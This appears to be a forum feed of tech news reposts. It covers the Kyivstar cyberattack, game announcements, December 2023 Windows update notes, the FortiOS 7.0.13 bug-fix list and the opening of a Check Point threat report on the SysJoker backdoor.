Jump to content
  • SeedTheNet
  • SeedTheNet
    According to a report by Reuters that Kyivstar mobile operator was hit by a cyberattack , resulting in most of the network to be taken down , as quoted by Reuters
     
     
    And a report by Netblocks website shows the attack impact on multiple cities :

     
     
    Source : https://www.reuters.com/technology/cybersecurity/ukraines-biggest-mobile-operator-suffers-massive-hacker-attack-statement-2023-12-12/
    Accessing the Kyivstar website would give this message (machine translated from Ukrainian) :

     
     

    SeedTheNet
    Ready or Not launches out of Early Access into 1.0 on December 13. Buy now: https://store.steampowered.com/app/11... Los Sueños – The LSPD reports a massive upsurge in violent crime across the greater Los Sueños area. Special Weapons and Tactics (SWAT) teams have been dispatched to respond to various high-risk scenes involving hostage situations, active bomb threats, barricaded suspects, and other criminal activities. Citizens are being advised to practice caution when traveling the city or to stay at home.
     
    Update:
    TOC to Entry Team, Launch will be in exactly T minus 24 hours. That means tomorrow December 13th, 10:00am PST (UTC-8). Synchronize your watches and get ready.

    SeedTheNet
    December 12, 2023—KB5033373 (OS Build 14393.6529)
    Windows 10, version 1607, all editions Windows Server 2016, all editions Release Date:
    12/12/2023
    Version:
    OS Build 14393.6529
    11/19/20
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of  Windows 10, version 1607, see its update history page.   
    Highlights
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes quality improvements. When you install this KB: 
    This update affects the Netherlands time zone. It adds the recent man-made landmass outside of Rotterdam to the shape files.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.  
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the December 2023 Security Updates.
    Known issues in this update
    Microsoft is not currently aware of any issues with this update.
    How to get this update
    Before installing this update
    Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    If you are using Windows Update, the latest SSU (KB5032391) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the Microsoft Update Catalog. 
    Install this update
    Release Channel
    Available
    Next Step
    Windows Update and Microsoft Update
    Yes
    None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business
    Yes
    None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog
    Yes
    To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS)
    Yes
    This update will automatically sync with WSUS if you configure Products and Classifications as follows:
    Product: Windows 10
    Classification: Security Updates
     
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5033373.

    SeedTheNet
    December 12, 2023—KB5033371 (OS Build 17763.5206)
    Win 10 Ent LTSC 2019 Win 10 IoT Ent LTSC 2019 Windows 10 IoT Core 2019 LTSC Windows Server 2019 Less Release Date:
    12/12/2023
    Version:
    OS Build 17763.5206
    11/17/20
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1809, see its update history page.  
    Highlights 
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes improvements. When you install this KB: 
    This update changes the English name of the former Republic of Turkey. The new, official name is the Republic of Türkiye.
    This update affects the Netherlands time zone. It adds the recent man-made landmass outside of Rotterdam to the shape files.
    This update affects Microsoft Defender for Endpoint (MDE). It enables Conditional Access (CA) scenarios.
     
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the December 2023 Security Updates.
    Windows 10 servicing stack update - 17763.5084
    This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. 
    Known issues in this update
    Symptom
    Workaround
    Using the FixedDrivesEncryptionType or SystemDrivesEncryptionType policy settings in the BitLocker configuration service provider (CSP) node in mobile device management (MDM) apps might incorrectly show a 65000 error in the "Require Device Encryption" setting for some devices in your environment. Affected environments are those with the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies set to enabled and selecting either "full encryption" or "used space only". Microsoft Intune is affected by this issue but third-party MDMs might also pe affected.
    Important This issue is a reporting issue only and does not affect drive encryption or the reporting of other issues on the device, including other BitLocker issues.
     
    To mitigate this issue in Microsoft Intune, you can set the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies to not configured.
    We are working on a resolution and will provide an update in an upcoming release.
     
     
    How to get this update
    Before installing this update
    Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    Prerequisite:
    You must install the August 10, 2021 SSU (KB5005112) before installing the LCU. 
     
    Install this update
    Release Channel
    Available
    Next Step
    Windows Update and Microsoft Update
    Yes
    None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business
    Yes
    None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog
    Yes
    To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS)
    Yes
    This update will automatically sync with WSUS if you configure Products and Classifications as follows:
    Product: Windows 10
    Classification: Security Updates
    If you want to remove the LCU
    To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
    Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5033371.
    For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 17763.5084. 
     

    SeedTheNet
    December 12, 2023—KB5033118 (OS Build 20348.2159)
    Windows Server 2022 Release Date:
    12/12/2023
    Version:
    OS Build 20348.2159
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows Server 2022, see its update history page.     
    Note Follow @WindowsUpdate to find out when new content is published to the Windows release health dashboard.     
    Improvements
    This security update includes quality improvements. When you install this KB:
    This update affects the Netherlands time zone. It adds the recent man-made landmass outside of Rotterdam to the shape files.
    This update affects Microsoft Defender for Endpoint (MDE). It enables Conditional Access (CA) scenarios.
     
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
    For more information about security vulnerabilities, please refer to the Security Update Guide and the December 2023 Security Updates.
    Windows Server 2022 servicing stack update - 20348.2084
    This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.
    Known issues in this update
    Microsoft is not currently aware of any issues with this update.
    How to get this update
    Before installing this update
    Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions.
     
    Install this update
    Release Channel
    Available
    Next Step
    Windows Update and Microsoft Update
    Yes
    None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business
    Yes
    None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog
    Yes
    To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS)
    Yes
    This update will automatically sync with WSUS if you configure Products and Classifications as follows:
    Product: Microsoft Server operating system-21H2
    Classification: Security Updates
     
    If you want to remove the LCU
    To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
    Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
    File Information
    For a list of the files that are provided in this update, download the file information for cumulative update 5033118. 
    For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 20348.2084. 

    SeedTheNet
    If you have been waiting for Cities Skylines 2 and then got disappointed of how poorly it runs , it's completely understandable , I was able to avoid the low FPS start of the game , but wasn't able to continue that much because loading my saved city would keep making the game crash!.
    According to Colossal Order developers post , we have to tweak some settings in order to get some better FPS from the game since the game is very un-optimized and need lot of fixing still or needs saving by the community modders.
    First recommendation from developers were to tune down the resolution to 1080p , I kept it as 1440p and went with other recommendations as below:

    Depth of Field - Disabled

    Volumetrics Quality - Disabled
     

    Depth of Field - Disabled
    Motion Blur - Disabled

    Dynamic Resolution Scale Quality - Disabled
    Even after tweaking those settings you will still experience stuttering and sudden decrease in FPS and even crashes , developer patches are still needed because the game isn't in the best condition it could have been.

    SeedTheNet

    GTA VI Trailer 1

    By SeedTheNet, in Gaming,

    Grand Theft Auto VI is an upcoming action-adventure game in development by Rockstar Games. It is due to be the eighth main Grand Theft Auto game, following Grand Theft Auto V
    Grand Theft Auto VI heads to the state of Leonida, home to the neon-soaked streets of Vice City and beyond in the biggest, most immersive evolution of the Grand Theft Auto series yet. Coming 2025 to PlayStation 5 and Xbox Series X|S.
    https://www.rockstargames.com/VI

    SeedTheNet
    Resolved issues
    The following issues have been fixed in version 7.0.13. To inquire about a particular bug, please contact Customer Service & Support.
    Anti Spam
    Bug ID
    Description
    877613
    Mark as Reject can be still chosen as an Action in an Anti-Spam Block/Allow List in the GUI.
    Anti Virus
    Bug ID
    Description
    911332
    When UTM status is enabled and the AV profile has no configuration, all SLL traffic is dropped and there is no WAD output.
    923883
    The FortiGate may display an error log in the crash log due to AV delta update. In case of failure, a full successful AV update is done.
    Application Control
    Bug ID
    Description
    939565
    can not query meta rules list seen on graceful/non-graceful upgrade.
    DNS Filter
    Bug ID
    Description
    931998
    DNS filter flow external domain AAAA query can still check the default category but not the remote category.
    Endpoint Control
    Bug ID
    Description
    897048
    FortiOS should support EMS 7.2.1 auth API status code changes.
    913324
    GUI repeated calls to the EMS API, which can cause EMS to not authorize the FortiGate correctly.
    Explicit Proxy
    Bug ID
    Description
    817582
    When there are many users authenticated by an explicit proxy policy, the Firewall Users widget can take a long time to load. This issue does not impact explicit proxy functionality.
    859693
    Sessions between the explicit proxy and server stay in SYN_SENT state when using IP pools in the explicit proxy policy for source NAT, even though the sessions have established. Traffic is not impacted.
    863665
    Denied explicit proxy keeps using the Fortinet_CA_SSL default certificate, even if the configured certificate is different.
    889300
    Wrong source IP address used for packets through explicit proxy routed to a member of SD-WAN interface.
    923302
    Cannot send picture through web explicit proxy.
    Firewall
    Bug ID
    Description
    719311
    On the Policy & Objects > Firewall Policy page in 6.4.0 onwards, the IPv4 and IPv6 policy tables are combined but the custom section name (global label) is not automatically checked for duplicates. If there is a duplicate custom section name, the policy list may show empty for that section. This is a display issue only and does not impact policy traffic.
    752267
    Load Balance Monitor detects a server in standby mode as being down.
    848058
    NPD failed to parse zone in the source interface of a DoS/ACL policy and failed to offload.
    851212
    After traffic flow changes to FGSP peer from owner, iprope information for synchronized sessions does not update on the peer side.
    861981
    Traffic drops between two back-to-back EMAC VLAN interfaces.
    879225
    Egress interface cannot be intermittently matched for Wake-on-LAN (broadcast) packets.
    879705
    Traffic issues occur with virtual servers after upgrading.
    884908
    Implicit deny policy is allowing "icmp/0/0" traffic.
    895946
    Access to some websites fails after upgrading to FortiOS 7.2.3 when the firewall policy is in flow-based inspection mode.
    897849
    Firewall Policy list may show empty sequence grouping sections if multiple policies are sharing the same global-label.
    912089
    Optimize CPU usage caused by a rare error condition which leads to no data being sent to the collector.
    914939
    UDP fragments dropped due to DF being set. Only the set honor-df global option.
    926029
    New sessions are created and evaluated after a certain number of UDP packets, even if set block-session-timer 300 is set.
    951373
    Traffic shaping is not matching the correct queue for outbound traffic.
    FortiView
    Bug ID
    Description
    894957
    On FortiView Websites, the real time view is always empty if disk logging is disabled.
    GUI
    Bug ID
    Description
    863126
    In an environment where the Security Fabric is enabled and there are more than 100 firewall object conflicts between the root and downstream FortiGates, the Firewall Object Synchronization pane does not list the details.
    892207
    Unable to authorize a newly discovered FortiAP from the WiFi Controller > Managed FortiAPs page.
    893560
    When private data encryption is enabled, the GUI may become unresponsive and HA may fail to synchronize the configuration.
    907041
    Network > SD-WAN > SD-WAN Zones and SD-WAN Rules pages do not load if a shortcut tunnel is triggered.
    916236
    GUI policy table cannot display sequence grouping section titles correctly if they are duplicated in the global label.
    919390
    Disabling gui-wireless-controller on the root VDOM impacts other VDOMs (unable to add or show WiFi widgets on first load).
    943949
    When editing an interface description in GUI, the following characters are not allowed: <, >, (, ), #, ', and ".
    946878
    FortiGate HA management interface in the GUI not allowing multiple route entries, but the CLI does allow them.
    HA
    Bug ID
    Description
    703614
    HA secondary synchronization fails and keeps rebooting when the primary has a split port configuration.
    771316
    Platforms in an HA environment get stuck in a reboot loop while attempting to synchronize configurations that differ in split ports.
    805663
    After upgrading, rebooting the primary in HA (A-A) results in unusually high bandwidth utilization on redundant interfaces.
    818432
    When private data encryption is enabled, all passwords present in the configuration fail to load and may cause HA failures.
    838571
    After an HA split-brain event, the PPPoE interfaces are not recovered.
    870312
    On a FortiGate HA cluster, both primary and secondary units are displayed as the Primary on the GUI top banner, and as Current HA mode in the CLI.
    875984
    FortiGate is going to out-of-sync after changing parameters of VDOM link interfaces.
    881337
    Adding a VLAN interface on any VDOM causes BGP flapping and VIP connectivity issues on VDOMs in vcluster2.
    893041
    Cannot access out-of-band IPv6 address on HA secondary unit.
    897865
    When NP7 platforms enable the GTP enhanced mode it does not use uninterruptible upgrade.
    902945
    Lost management connectivity to the standby node via in-band management.
    904318
    FortiGate sent ARP request with loopback IP address as the source address.
    912665
    FGCP primary-secondary cluster only uses one session-sync-dev, in spite of having multiple session-sync-dev.
    916216
    When adding a new interface, some other interfaces have the wrong virtual MAC address.
    920233
    The System > HA page is missing from the GUI on 5K models.
    931724
    HA events not synchronizing between members, leading to unexpected HA status.
    950868
    Traffic is not forwarded on L2 peer to keep FGSP with an available L2 connection.
    953167
    Access to console and SSH is lost due to a specific configuration.
    Hyperscale
    Bug ID
    Description
    915796
    With an enabled hyperscale license, in some cases with exception traffic (like ICMP error traverse), the FortiGate may experience unexpected disruptions when handling the exception traffic.
    924196
    Device is rebooting randomly when driver processes exception packets.
    ICAP
    Bug ID
    Description
    884339
    When the algo process starts up, it attempts to build an ICAP profile without allocating memory beforehand.
    Intrusion Prevention
    Bug ID
    Description
    823583
    Failover on clustered web application using keepalived daemon does not work seamlessly.
    842523
    IPv6 with hardware offloading and IPS drops traffic (msg="anti-replay check fails, drop).
    860315
    Unexpected behavior in IPS engine when executing diagnose test application ipsmonitor 44.
    862830
    [?Q?ci_" sekret=] causes the parser to create a new field, "sekret=".
    873975
    Source MAC changes and the packet drops due to both sides of the session using the same source MAC address.
    882593
    HTTPS traffic slows when IPS with NTurbo is used over a virtual wire pair.
    892302
    Constant reloading of the external domain table is causing high CPU due to lock contention when reloading the table.
    926639
    Constant reloading of the shared memory external domain table is causing high CPU usage due to lock contention when reloading the table.
    952270
    IPS logs for VIP traffic shows external IP as a destination for some signatures.
    IPsec VPN
    Bug ID
    Description
    766750
    FortiGate does not accept secondary tunnel IP address in the same subnet as the primary tunnel.
    812229
    ASCII-encoded byte code of remote gateway IP is displayed in the GUI and CLI when a VPN tunnel is formed using IKEv1 or v2 if the peer-id is not configured.
    872769
    Proxy ARP stops working for a client connected to a dialup IPsec when the previous VPN was established and is deleted.
    885333
    Forwarded broadcast traffic on ADVPN shortcut tunnel interface dropped.
    887800
    In an L2TP configuration, set enforce-ipsec enable is not working as expected after upgrading.
    920725
    IPsec tunnels that have external DHCP services for IP assignment have an extra selector added after upgrading to 7.0.11.
    922064
    Firewall becoming unresponsive to DPD/IKE messages, causing IPsec VPNs to drop.
    926048
    Traffic through a shortcut got dropped after an HA failover.
    928774
    IPsec VPN connection should allow % in FortiClient Connect REG_PASSWD field.
    932112
    EAP in IKEv2 dialup IPsec connection does not work with two firewall polices, each using both the IKEv2 interface and user group.
    949086
    Policy route is not matching ESP traffic.
    954614
    IPsec phase 2 negotiation fails with failed to create dialup instance, error 22 error message.
    Log & Report
    Bug ID
    Description
    831441
    The forward traffic log show exabytes of data being sent and received from external to external IP addresses in multiple VDOMs.
    860822
    When viewing logs on the Log & Report > System Events page, filtering by domain\username does not display matching entries.
    879228
    FortiAnalyzer override settings are not taking effect when ha-direct is enabled.
    893199
    The FortiGate does not generate deallocate/allocate logs of the first IP pool when the first IP pool has been exhausted.
    902797
    IPS alert email not being sent when IPS attack event has triggered.
    908856
    Traffic log can show exabytes of data sent and received when generating log task is triggered from userspace.
    932537
    If Security Rating is enabled to run on schedule (every 4 hours), the FortiGate can unintentionally send local-out traffic to fortianalyzer.forticloud.com during the Security Rating run.
    Proxy
    Bug ID
    Description
    783549, 902613, 921247
    An error condition occurs in WAD caused by multiple outstanding requests sent from client to server with UTM enabled.
    785927
    Unexpected behavior in WAD when multiple DHCP servers are configured.
    820096
    CPU usage issue in proxyd caused by the absence of TCP teardown.
    863132
    Proxy mode inspection is slow when testing a single TCP stream from fast.com, which causes bandwidth slowness on FG-100F and FG-200F devices.
    882182
    Unexpected behavior in WAD due to the activation of firewall protocol options, with both client and server comfort features enabled.
    897347
    Memory usage issue caused by the WAD user info process while authenticating the LDAP users.
    912116
    Website (li***.cz) is not working in proxy inspection mode with deep inspection and web filter applied.
    REST API
    Bug ID
    Description
    892237
    Updating the HA monitor interface using the REST API PUT request fails and returns a -37 error.
    903908
    The forticron application crashes when restoring a VDOM configuration.
    948356
    An error condition occurs in HTTPSD when a REST API request is sent with invalid parameters.
    Routing
    Bug ID
    Description
    775752
    link-down-failover does not bring the BGP peering down.
    779330
    The SD-WAN service with load-balance mode is disabled, even though there is still a member alive in the service rule.
    827565
    Using set load-balance-mode weight-based in SD-WAN implicit rule does not take effect occasionally.
    839669
    Static route through an IPsec interface is not removed after the BFD neighbor goes down.
    858248
    OSPF summary address for route redistribution from static route via IPsec VPN always persists.
    875668
    SD-WAN SLA log information has incorrect inbound and outbound bandwidth values.
    900941
    config redistribute routing subsections cannot be configured when in workspace mode.
    906896
    Make OSPFv3 update the translator role and translated Type-5 LSA when the ASBR table is updated.
    922491
    Static routes are installed on hub FortiGate with add-route disabled in ADVPN scenario.
    924940
    When there are a lot of policies (several thousands), the interface member selection for the SD-WAN Zone dialog may take up to a minute to load.
    928152
    FortiGate generates two OSPF stub entries for the same prefix after upgrading from 6.4 to 7.0.
    Security Fabric
    Bug ID
    Description
    851656
    Sessions with csf_syncd_log flag in a Security Fabric are not logged.
    912592
    Allow comments and IP addresses to be on the same line for external IP address threat feeds.
    912917
    Send Fabric API calls with pagination filter.
    917024
    Unexpected behavior in Security Fabric daemon (CSFD) caused by triggering HA failover while using Security Fabric.
    920391
    Non-management VDOM is not allowed to set a source-ip for config system external-resource.
    922896
    Azure SDN connector always uses HA management port for DNS resolve. This might not work on premises where the HA management port does not have a public IP address assigned.
    SSL VPN
    Bug ID
    Description
    631809
    Configuring thousands of mac-addr-check-rule in portal makes the CPU spike significantly if several hundreds of users are connecting to the FortiGate, thus causing SSL VPN packet drops.
    843756
    Customer bookmark (*.tr***.pt) is not accessible when using SSL VPN web mode.
    859088
    FortiGate adds extra parenthesis and causes clicking all links to fail in SSL VPN web mode.
    871229
    SSL VPN web mode does not load when connecting to customer's internal site.
    873516
    FortiGate misses the closing parenthesis when running the function to rewrite the URL.
    875167
    Webpage opened in SSL VPN web portal is not displayed correctly.
    881220
    Found bad login for SSL VPN web-based access when enabling URL obscuration.
    881268
    Disconnecting from SSL VPN using the SSL-VPN widget does not disconnect the SSL VPN tunnel.
    884869
    Web mode bookmark showing blank page due to JS rewrite.
    885978
    Some buttons in URL are not working in SSL VPN web mode.
    886989
    SSL VPN process reaches 99% CPU usage when HTTP back-end server resets the connection in the middle of a post request.
    887345
    When a user needs to enter credentials through a pop-up window, the key events for modification key detected by SDL were ignored.
    887674
    FortiGate will intermittently stop accepting new SSL VPN connections across all VDOMs.
    897385
    Internal website keeps asking for credential with SSL VPN web mode.
    897665
    The external DHCP server is not receiving hostnames in SSL VPN and DHCP relay.
    904919
    DHCP option 12 hostname needed for SSL VPN with external DHCP servers.
    927475
    SSL VPN tunnel down log message not generated when an IP address is disassociated before the old tunnel times out.
    933985
    FortiGate as SSL VPN client does not work on NP6 and NP6XLite devices.
    950157
    SS LVPN connected/disconnected endpoint event log can be in the wrong sequence.
    952860
    During a handshake when FortiClient sends a larger-than-MTU hello message, the packet is fragmented by IP layer and dropped by the FortiGate.
    Switch Controller
    Bug ID
    Description
    890912
    FortiLink VLAN interface should be renamed from default to _default after upgrading to 7.0.10.
    893405
    One discovery one transmit buffer was allocated and was not released on connection terminations.
    894735
    Unable to configure more than one NAC policy using the same EMS tag for different FortiSwitch groups.
    911232
    Security rating shows an incorrect warning for unregistered FortiSwitches on the WiFi & Switch Controller > Managed FortiSwitches.
    920231
    FortiGate loses QoS ip-dscp-map configuration after reboot.
    936081
    The vlan-optimization {enable | disable} and vlan-all-mode all configuration options disappear after upgrade or reboot.
    System
    Bug ID
    Description
    708964
    CPU usage issue is observed caused by reloading the system when the system has cfg-save set to revert.
    713951
    Not all ports are coming up after an LAG bounce on 8 × 10 GB LAG with ASR9K. Affected platforms: FG-3960E and FG-3980E.
    724085
    Traffic passing through an EMAC VLAN interface when the parent interface is in another VDOM is blocked if NP7 offloading is enabled.
    729912
    DNS proxy does not transfer the DNS query for IPv6 neighbor discovery (ND) when client devices are using random MAC addresses, so one device can configure many IPv6 addresses.
    822297
    Polling fgfwpolid returns disabled policies.
    828129
    A disabled EMAC VLAN interface is replying to a ping.
    832154
    The cmdbsvr process may crash when there are many addresses and address groups that include each other recursively.
    842159
    FortiGate 200F interfaces stop passing traffic after some time.
    855573
    False alarm of the PSU2 occurs with only one installed.
    859393
    SNMP poll for fgExplicitProxyRequests returns 0.
    862519
    FortiGate 40F-3G4G WWAN connection unstable on Verizon Carrier.
    866437
    CPU usage issue caused by the new Linux kernel.
    867663
    The FEC configuration under the interface is not respected when port23 and port24 are members of an LACP and the connection is 100G. Affected platforms: FGT-340xE, FGT-360xE.
    869044
    If the original packet was forwarded with NAT, generated ICMP error is routed back to SNAT'ed address.
    873805
    CPSS usage goes to 99% and causes initiation issues when traffic is flowing upon boot. Affected platforms: FG-40xF, FG-60xF, FG-300xF.
    874292
    ssh-rsa should be disabled under the SSH server_host_key_algorithm.
    876853
    No output of execute sensor list is displayed after rebooting.
    879769
    If the firewall session is in check-new mode, FortiOS will not flush its NPU offload entry when there is a MAC address update of its gateway.
    882187
    FortiGate enters conserve mode in a few hours after enabling UTM on the policies.
    884023
    When a user is logged in as a VDOM administrator with restricted access and tries to upload a certificate (System > Certificates), the Create button on the Create Certificate pane is greyed out.
    885823
    Sensor showing temperature of 0.00 Celsius.
    891165
    Auto-script causes FortiGate to repeat commands.
    892274
    Daylight saving time is not applied for Cairo time zone.
    892478
    Interface release from cmdb and iprope keep updating when DHCP client renewal fails.
    894202
    Incorrect temperature calculation appears in sensor list on FG-8xF, FWF-8xF, FG-9xE, FG-10xE, FG-20xE, and FG-14xE.
    894884
    FSTR session ticket zero causes a memory leak.
    903362
    SNMP OID, fgFwPolLastUsed (1.3.6.1.4.1.12356.101.5.1.2.1.1.4), does not show the correct information about the last time a specific policy was used.
    903397
    After upgrading to 7.0.11, FortiOS cannot display QSFP+ transceiver information. Affected platforms: FG-110xE, FG-220xE, FG-330xE, FG-340xE, and FG-360xE.
    904414
    Port speed 1000auto could not link up with a Cisco switch.
    904486
    The FortiGate may display a false alarm message and subsequently initiate a reboot.
    907339
    dnsproxy process aborts due to stack buffer overflow being detected upon function return.
    910269
    Unexpected behavior caused by the Linux Out of Memory (OOM) killer when memory is very low.
    910273
    Last reboot reason: power cycle after rebooting due to a kernel panic is misleading.
    910616
    When a non-zero DSCP copied from ingress to egress packet for NAT64, the IP checksum is calculated incorrectly.
    910651
    All members are up on an FG-600F, but the LACP status is showing as down after upgrading.
    910677
    Transparent mode FortiGate does not reply to SYN ACK when communicating with FortiManager.
    920085
    CPU usage issue observed in dnsproxyd caused by unused wildcard FQDN.
    922965
    CPU usage issue observed in hasync daemon when session count is large.
    922982
    FortiGate does not respond to ARP requests for the IP address on the WAN port when the interface is configured as EMAC.
    923364
    System goes into halt state with Error: Package validation failed... message in cases where there are no engine files in the FortiGate when the BIOS security level is set to 2.
    924395
    IPv6 local-in ping6 to management interface failed when newly configured.
    925657
    After a manual system administrator password change, the updated password-expire is not received by the FortiManager auto-update.
    926035
    On D-series FortiGates, a false alarm during system integrity check failure causes the firewall to reboot.
    926817
    Review the temperature sensor for the SoC4 system.
    929821
    An error condition occurred in httpsd and newcli when trying to generate a TAC report from the GUI and CLI, respectively.
    939411
    Multiple spawns of Hotplug process consuming high CPU resources.
    940571
    Memory usage issue caused by excessive log files.
    942502
    Kernel panic occurs when creating EMAC VLAN interfaces based on an aggregate interface with new kernel 4.1.9.
    945871
    DNAT does not work on software switch in explicit mode.
    Upgrade
    Bug ID
    Description
    920223
    System hangs after upgrade with the following error at bootup: cli 141 die in an exception in line 4495: Hrp.
    939011
    All transparent VDOMs cannot synchronize because of switch-controller.auto-config.policy.
    User & Authentication
    Bug ID
    Description
    790884
    The FortiGate will not send a MAC-based authentication RADIUS authentication request for one of the devices on the network.
    794477
    When a user's membership in AD or port range is changed, all of the user sessions are cleared.
    850473
    SSL VPN and firewall authentication SAML does not work when the application requires SHA-256.
    858877
    Dynamic address only has 100 IP addresses while FSSO group lists all 56K ACI endpoints.
    868994
    FortiGate receives FSSO user in the format of HOSTNAME$.
    883006
    Adding a new group membership to an FSSO user terminates all the user's open sessions.
    899852
    FortiGate is sending Class(25) AVP with wrong length in RADIUS accounting when using 2FA with PUSH or external tokens.
    901743
    An error condition occurs during the processing of the UDP packets when device identification is activated on an interface.
    943087
    Guest management users no longer view the password automatically generated by the firewall.
    VM
    Bug ID
    Description
    901920
    AWS external account list supports regional endpoints.
    913696
    In the periodic status check of the OCI VM status, too many API calls caused a lot of 429 errors.
    921168
    Restore operation overwrite passive configuration in AZURE A-P deployment based on SDN connector.
    927323
    Event log alert Write Permission Violation to read-only file on VMware after taking snapshot.
    932085
    In an Azure cluster, the NTP source-ip6 (IPv6) is synchronized while the source-ip (IPv4) is not.
    950899
    Azure FortiGate keeps rebooting after upgrading to 7.0.11, and the device enters kernel panic.
    VoIP
    Bug ID
    Description
    887384
    SIP session is dropped by ALG with media type doesn't match message.
    Web Filter
    Bug ID
    Description
    829704
    Web filter is not logging all URLs properly.
    878442
    FortiGuard block page image (logo) is missing when the Fortinet-Other ISDB is used.
    916140
    An error condition occurs in WAD caused by the mismatch between the SNI host and CNAME.
    941045
    Local rating chooses the wrong category if the URL path falsely matches to a longer local rating URL.
    WiFi Controller
    Bug ID
    Description
    875382
    When accessing the managed FortiAP/Switch view with a large number of devices in the topology, the page takes a long time to load.
    904349
    Unable to create FortiAP profile in the GUI for dual-5G mode FortiAP U231F/U431F models.
    Workaround: use the CLI to update the profile to dual-5G mode.
    905406
    In auth-logon and auth-logout logs, Wi-Fi users with random public IP addresses are observed.
    926999
    EAP proxy daemon crashed with signal 11 and keeps reloading after receiving an empty username.
    ZTNA
    Bug ID
    Description
    888814
    Unable to match first group attribute from SAML assertion for ZTNA rule.
    889994
    After client device information is updated, the session is closed even though all information from the session still matches the policy.
    923804
    ZTNA logs are showing the log message Denied: failed to match a proxy-policy when client device information matches the policy.
    Common Vulnerabilities and Exposures
    Visit https://fortiguard.com/psirt for more information.
    Bug ID
    CVE references
    875854
    FortiOS 7.0.13 is no longer vulnerable to the following CVE Reference:
    CVE-2023-28001 911617
    FortiOS 7.0.13 is no longer vulnerable to the following CVE Reference:
    CVE-2023-37935

    SeedTheNet
    Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker
    https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker
      November 23, 2023   Key Findings
    Check Point Research is actively tracking the evolution of SysJoker, a previously publicly unattributed multi-platform backdoor, which we asses was utilized by a Hamas-affiliated APT to target Israel. Among the most prominent changes is the shift to Rust language, which indicates the malware code was entirely rewritten, while still maintaining similar functionalities. In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command and control server) URLs. Analysis of newly discovered variants of SysJoker revealed ties to previously undisclosed samples of Operation Electric Powder, a set of targeted attacks against Israeli organizations between 2016-2017 that were loosely linked to the threat actor known as Gaza Cybergang. Introduction
    Amid tensions in the ongoing Israel-Hamas war, Check Point Research has been conducting active threat hunting in an effort to discover, attribute, and mitigate relevant regional threats. Among those, some new variants of the SysJoker malware, including one coded in Rust, recently caught our attention. Our assessment is that these were used in targeted attacks by a Hamas-related threat actor.
    SysJoker, initially discovered by Intezer in 2021, is a multi-platform backdoor with multiple variants for Windows, Linux and Mac. The same malware was also analyzed in another report a few months after the original publication. Since then, SysJoker Windows variants have evolved enough to stay under the radar.
    As we investigated the newer variants of SysJoker that were utilized in targeted attacks in 2023, we also discovered a variant written in Rust, which suggests the malware code was completely rewritten. In addition, we also uncovered behavioral similarities with another campaign named Operation Electric Powder which targeted Israel in 2016-2017. This campaign was previously linked to Gaza Cybergang (aka Molerats), a threat actor operating in conjunction with Palestinian interests.
    In this article, we drill down into the Rust version of SysJoker, as well as disclose additional information on other SysJoker Windows variants and their attribution.
    Rust SysJoker Variant
    The SysJoker variant (9416d7dc2ecdeda92ba35cd5e54eb044), written in Rust, was submitted to VirusTotal with the name php-cgi.exe on October 12, 2023. Compiled a few months earlier on August 7, it contains the following PDB path: C:\Code\Rust\RustDown-Belal\target\release\deps\RustDown.pdb.
    The malware employs random sleep intervals at various stages of its execution, which may serve as possible anti-sandbox or anti-analysis measures.
